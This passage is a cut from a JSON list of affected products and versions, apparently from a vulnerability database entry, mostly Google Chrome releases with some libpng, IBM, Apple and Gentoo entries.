"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "44.0.2403.89"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1061.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.91"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.676.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.90"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.52"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.681.0"
},
{
"_id": null,
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.49"
},
{
"_id": null,
"model": "decision optimization center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.97"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.135"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.11"
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.950.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.78"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.613.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.36"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1276.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.163"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.16"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1049.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1281.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.162"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.862.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.70"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.682.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.940.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.22"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1683.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.151"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.48"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.50"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.88"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1077.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.921.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.17"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.155"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1041.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.69"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.40"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.45"
},
{
"_id": null,
"model": "powerkvm build",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "3.13"
},
{
"_id": null,
"model": "powerkvm build",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1.158"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.561.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.5"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.19"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1306.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1311.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.586.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.928.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.93"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.766.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.740.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.125"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.603.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.14"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.3.50"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "40.0.2214.85"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.830.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.95"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.66"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.795.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.75"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.126"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.131"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.687.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.84"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.925.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.864.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.69"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "38.0.2125.101"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1076.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.117"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.106"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.63"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.72"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.40"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1682.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.959.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.106"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.47"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.624.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.40"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.612.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.156"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "42.0.2311.135"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1293.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1668.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1654.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.58"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.73"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.698.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1079.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.29"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.74"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.338"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.71"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.598.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.89"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1287.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.30"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.65"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.30"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.894.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.87"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.737.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.906.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.777.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.58"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.954.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1284.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.237"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.214"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.21"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1444.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1672.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.53"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.52"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.827.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.320"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.124"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.81"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.28"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.30"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.311"
},
{
"_id": null,
"model": "tivoli composite application manager for transactions",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.693.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.36"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1069.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1668.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.98"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1019.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.606.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.775.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.62"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.120"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.11.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.113"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.22"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.60"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1299.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.869.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.738.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.64"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.56"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.102"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.231"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.32"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.36"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.29"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.116"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.98"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.578.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.79"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.121"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.63"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.29"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.958.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.809.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.17"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.105"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.50"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1681.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.76"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1036.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.701.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.780.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.116"
},
{
"_id": null,
"model": "chrome",
